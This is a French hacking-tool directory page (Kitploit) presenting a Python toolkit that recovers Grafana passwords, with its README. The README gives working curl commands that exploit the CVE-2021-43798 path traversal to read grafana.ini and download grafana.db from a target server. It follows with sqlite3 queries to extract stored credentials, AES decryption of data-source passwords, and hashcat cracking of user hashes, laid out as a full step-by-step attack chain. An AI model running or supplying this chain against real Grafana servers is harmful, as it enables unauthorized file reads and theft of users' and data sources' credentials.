Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Grafana-Password-Decryptor — Boîte à outils Python pour le déchiffrement AES-256 et le cassage de mots de passe PBKDF2 provenant de bases de données Grafana, généralement associé à (CVE-2021-43798) | Kitploit
Outils/GitHubGitHub/strikoder-premium/grafana-password-decryptor
Cassage de Mots de PasseOutils de Chiffrement/DéchiffrementAnalyse des VulnérabilitésExploitationPost-ExploitationCryptographie
GitHubstrikoder-premium/grafana-password-decryptor

Grafana-Password-Decryptor

Boîte à outils Python pour le déchiffrement AES-256 et le cassage de mots de passe PBKDF2 provenant de bases de données Grafana, généralement associé à (CVE-2021-43798)

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
13il y a 8 moisPas encore vérifié

Déchiffreur de mots de passe Grafana

Kit Python pour déchiffrer et casser les mots de passe Grafana à partir de multiples formats.

Codé par : strikoder

Que fait cet outil ?

Gère deux types de stockage de mots de passe Grafana :

  • 🔐 AES-256 Base64 (table data_source) → Déchiffrez directement avec AESDecrypt.py
  • 🔨 PBKDF2_HMAC_SHA256 (table user) → Convertissez pour Hashcat avec grafana2hashcat.py

Parfait pour la post-exploitation après le path traversal CVE-2021-43798.

Qu'est-ce que CVE-2021-43798 ?

Une vulnérabilité de path traversal dans les versions 8.0.0-beta1 à 8.3.0 de Grafana qui permet à des attaquants non authentifiés de lire des fichiers arbitraires sur le serveur, y compris :

  • Fichiers de configuration (/etc/grafana/grafana.ini)
  • Fichiers de base de données (/var/lib/grafana/grafana.db)
  • Fichiers système (/etc/passwd)

Exemple d'exploitation :

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is --output grafana.db

Ce kit complète la chaîne d'attaque en déchiffrant/cassant les mots de passe que vous extrayez de la base de données.

Outils inclus

1. AESDecrypt.py

Déchiffre les mots de passe chiffrés en AES-256 de la table data_source.

Basé sur : jas502n/Grafana-CVE-2021-43798 avec des améliorations clés :

  • ✅ Clé secrète flexible : Extrayez la clé manuellement (pas de chemins codés en dur)
  • ✅ Traitement par lots : Déchiffrez plusieurs hachages depuis un fichier
  • ✅ Entièrement configurable : Tous les paramètres via les options CLI

2. grafana2hashcat.py

Convertit les hachages PBKDF2_HMAC_SHA256 de Grafana de la table user au format compatible Hashcat pour le cassage de mots de passe.

Crédit : iamaldi/grafana2hashcat

Installation

root@kitploit:~
git clone https://github.com/strikoder/Grafana-Password-Decryptor.git
cd Grafana-Password-Decryptor
pip install cryptography #for Decyrption
chmod +x AESDecrypt.py grafana2hashcat.py

Utilisation

Outil 1 : AESDecrypt.py (pour les mots de passe AES-256 Base64)

Déchiffrer un seul hachage

root@kitploit:~
python3 AESDecrypt.py -hash R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

Déchiffrer plusieurs hachages

root@kitploit:~
python3 AESDecrypt.py -f hashes.txt

Utilisation d'une clé secrète personnalisée

Extrayez la clé secrète de la configuration Grafana :

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' --path-as-is | grep secret_key

python3 AESDecrypt.py -hash [HASH] -k YOUR_SECRET_KEY

Outil 2 : grafana2hashcat.py (pour les hachages PBKDF2)

Convertir un seul fichier de hachages

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt

Format d'entrée (grafana_hashes.txt) :

root@kitploit:~
hash1,salt1
hash2,salt2
hash3,salt3

Sortie (prête pour Hashcat) :

root@kitploit:~
sha256:10000:base64_salt:base64_hash

Enregistrer dans un fichier

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

Casser avec Hashcat

root@kitploit:~
hashcat -m 10900 hashcat_hashes.txt wordlist.txt

Exemple complet d'exploitation

Scénario 1 : Mots de passe chiffrés en AES (table data_source)

root@kitploit:~
# 1. Extract secret key from grafana.ini (might be empty in some cases, use default key in python program in that case)
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' \
  --path-as-is | grep secret_key

# 2. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 3. Extract AES-encrypted passwords from data_source table
sqlite3 grafana.db "SELECT name, password FROM data_source;"

# 4. Save passwords to file (one per line)
# Example: R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

# 5. Decrypt with extracted secret key
python3 AESDecrypt.py -f passwords.txt -k [SECRET_KEY]

Scénario 2 : Hachages PBKDF2 (table user)

root@kitploit:~
# 0. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 1. Extract PBKDF2 password hashes from user table
sqlite3 grafana.db "SELECT login, password, salt FROM user;"

# 2. Format hashes for grafana2hashcat (hash,salt format)
# Example format in grafana_hashes.txt:
# 3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper

# 3. Convert to Hashcat format
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

# 4. Crack with Hashcat (mode 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_hashes.txt rockyou.txt

Référence rapide : Quel outil utiliser ?

Crédits

  • AESDecrypt.py : Codé par strikoder, basé sur l'implémentation Go de jas502n
  • grafana2hashcat.py : Créé par iamaldi

⭐ Utile ? Mettez-lui une étoile !

Codé par strikoder

Télécharger l’outil
Type de mot de passeTable de base de donnéesFormatOutilMode Hashcat
Chiffré AES-256data_sourceChaîne Base64AESDecrypt.pyN/A (déchiffrement direct)
PBKDF2_HMAC_SHA256userHachage hex + selgrafana2hashcat.py-m 10900